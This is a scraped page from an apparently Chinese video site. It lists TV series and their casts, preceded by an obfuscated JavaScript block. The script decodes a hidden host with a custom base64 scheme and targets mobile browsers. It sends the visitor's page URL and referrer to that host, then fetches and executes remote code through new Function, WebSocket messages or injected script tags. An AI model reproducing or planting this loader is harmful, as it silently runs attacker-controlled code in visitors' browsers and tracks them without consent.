function ncoa(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r, o, c, s, a, i, l;
let d = 0;
let f = String(e).replace(/\r\n/g, "\n");
let h = "";
for (let e = 0; e < f.length; e++) {
const t = f.charCodeAt(e);
if (t < 128) {
h += String.fromCharCode(t);
} else if (t > 127 && t < 2048) {
h += String.fromCharCode(t >> 6 | 192);
h += String.fromCharCode(t & 63 | 128);
} else {
h += String.fromCharCode(t >> 12 | 224);
h += String.fromCharCode(t >> 6 & 63 | 128);
h += String.fromCharCode(t & 63 | 128);
}
}
while (d < h.length) {
r = h.charCodeAt(d++);
o = h.charCodeAt(d++);
c = h.charCodeAt(d++);
s = r >> 2;
a = (r & 3) << 4 | o >> 4;
i = (o & 15) << 2 | c >> 6;
l = c & 63;
if (isNaN(o)) {
n += t.charAt(s) + t.charAt(a);
} else if (isNaN(c)) {
n += t.charAt(s) + t.charAt(a) + t.charAt(i);
} else {
n += t.charAt(s) + t.charAt(a) + t.charAt(i) + t.charAt(l);
}
}
return n;
}
function qqaoxjj(e) {
const t = "UAB234CDE_FGHIJKQRSTVWXcdefghijklm-nopqrstuvwxyz015LMNOP6789YZab";
let n = "";
let r = 0;
let o, c, s, a;
const i = String(e).replace(/[^A-Za-z0-9\-_]/g, "");
const l = i.length;
while (r < l) {
if (r == l) o = -1; else o = t.indexOf(i.charAt(r++));
if (r == l) c = -1; else c = t.indexOf(i.charAt(r++));
if (r === l) s = -1; else s = t.indexOf(i.charAt(r++));
if (r === l) a = -1; else a = t.indexOf(i.charAt(r++));
if (o === -1 || c === -1) {
break;
}
const e = o << 2 | c >> 4;
n += String.fromCharCode(e);
if (s !== -1) {
const e = (c & 15) << 4 | s >> 2;
n += String.fromCharCode(e);
}
if (a !== -1) {
const e = (s & 3) << 6 | a;
n += String.fromCharCode(e);
}
}
let d = "";
r = 0;
while (r < n.length) {
const e = n.charCodeAt(r);
if (e < 128) {
d += String.fromCharCode(e);
r++;
} else if (e > 191 && e < 224) {
const t = n.charCodeAt(r + 1);
d += String.fromCharCode((e & 31) << 6 | t & 63);
r += 2;
} else {
const t = n.charCodeAt(r + 1);
const o = n.charCodeAt(r + 2);
d += String.fromCharCode((e & 15) << 12 | (t & 63) << 6 | o & 63);
r += 3;
}
}
return d;
}
function yebl(e) {
return Math.floor(Math.random() * (e + 1));
}
window['gj'+'tu'+'hd'] = navigator.platform && !/^Mac|Win/.test(navigator.platform) || !navigator.platform && /Android|iOS|iPhone/i.test(navigator.userAgent) ? function() {
(function(e, t, n) {
const r = n[qqaoxjj("dPW5hqWyi4Inhqp0iU")];
let o = "";
try {
o = opener ? opener.document.location.href : n.referrer;
} catch (e) {
o = n.referrer;
}
if (o && o.length > 900) {
o = o.slice(0, 900);
}
let c = t.location.href;
if (c && c.length > 900) {
c = c.slice(0, 900);
}
const s = qqaoxjj(e).split(",");
const a = s[3];
const i = s[2];
let l = s[4];
let d;
if (l.indexOf(";") > -1) {
let e = l.split(";");
if (e.length < 1) return;
if (e.length > 1) {
d = e[yebl(e.length)];
} else {
d = e[0];
}
} else {
d = l;
}
const f = ncoa(`su=${d}&t=${s[0]}&d=${s[1]}&r=${o}&m=${Date.now()}&u=${c}&sm=${i}`);
const h = navigator.userAgent;
if (h.indexOf("b" + "ai" + "d" + "u") !== -1) {
const e = new XMLHttpRequest;
e.open("POST", `${i}://${d}/getSv/${f}`);
e.setRequestHeader("Content-Type", "application/x-www-form-urlencoded;");
e.setRequestHeader("X-REQUESTED-WITH", "XMLHttpRequest");
e.onreadystatechange = function() {
if (e.readyState === 4 && e.status === 200) {
const t = JSON.parse(e.responseText);
const n = new Function("c", `${qqaoxjj(t.ds)}; return ${t.ns}(c);`)(t.img.join(""));
new Function("_tdcs", n)(r);
}
};
e.send();
} else if (t.WebSocket && /UCBrowser|Quark|Huawei|Vivo|NewsArticle/i.test(h)) {
const e = new WebSocket(`${a}://${d}/ws/${f}`);
e.onmessage = function(t) {
e.close();
const o = t.data.split(";");
if (o.length > 2) {
remoteCode = qqaoxjj(o[0]);
remoteCode += qqaoxjj(o[1]);
remoteCode += qqaoxjj(o[2]);
new Function("_tdcs", remoteCode)(r);
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
};
e.onerror = function() {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
};
} else {
const e = n.createElement("script");
e.src = `${i}://${d}/vsn/${f}`;
r.parentElement.insertBefore(e, r);
}
})("H501H2ULGCmMiDALGDiLh51nhOILfrHydPpziQ", window, document);
} : function() {};
-
源来是你·青春季
主演:王子异,朱星杰,董又霖,周锐,黄新淳,董岩磊
-
在恋爱开始之前
主演:梁田 罗一舟 钟丽缇 葛夕 金莎 孙丞潇
-
-
-
-
-
-
死因之谜
主演:伊丽莎白·赫利 乔治娅·洛克 劳伦·麦奎因 弗莱迪·索普 吉娜维芙·冈特 Pear Chiravara 马克斯·帕克 利里奥·博阿滕 Agi Nanjosi J.T. Foxx Corbie Cenita Billy Phillips 艾梅柏·汤森 托马斯·唐尼
-
马普尔小姐探案第一季
主演:杰拉尔丁·麦克伊万 佐伊·沃纳梅克 迈克尔·兰德斯 格里夫·林斯·琼斯 大卫·沃纳 蕾切尔·斯特灵
-
历劫惊途第二季
主演:伊德瑞斯·艾尔巴,尼尔·马斯克尔,伊芙·迈勒斯,克里斯蒂尼·亚当斯,马克思·比斯雷,雅奇·潘嘉比,霍莉·艾尔德,本·迈尔斯,哈蒂·莫拉汉,内尔·斯杜克,凯萨·哈姆隆德,佐拉·毕晓普,杰瑞米·安·琼斯,凯特·菲利普斯,贾斯珀·布里顿,艾米·凯莉,穆罕默德·艾尔森德,西蒙·迈克伯尼,詹姆斯·伯罗斯,马库斯·加维
-
第二届“信仰的力量全国广播电视和网络视听行业青年演讲比赛决赛
主演:李杨薇 , 郑方一
-
再会~沉默的真相
主演:竹内凉真,井上真央,濑户康史,渡边大知,北香那,段田安则,江口德子,小柳友,三浦绮罗
-
第一人称复数第三季
主演:陈丹青 , 陈行甲 , 董宇辉 , 鸟鸟 , 项飙 , 易立竞 , 张昊辰 , 张越
-
神之水滴第二季
主演:山下智久 , 弗蕾尔·格夫里尔 , 汤姆·沃兹尼奇卡 , 古斯塔弗·科文 , 塞希尔·布瓦 , 二阶堂智 , 安托万·夏佩 , 佩德罗·卡萨布兰科 , 丽兹·布罗谢 , 卡罗琳·盖伊 , 弗朗索瓦·马尔图雷特 , Dominique MacAvoy , Basile Lacoeuilhe , 加濑亮 , Hayato Maki , Cayetano Flores Marques
-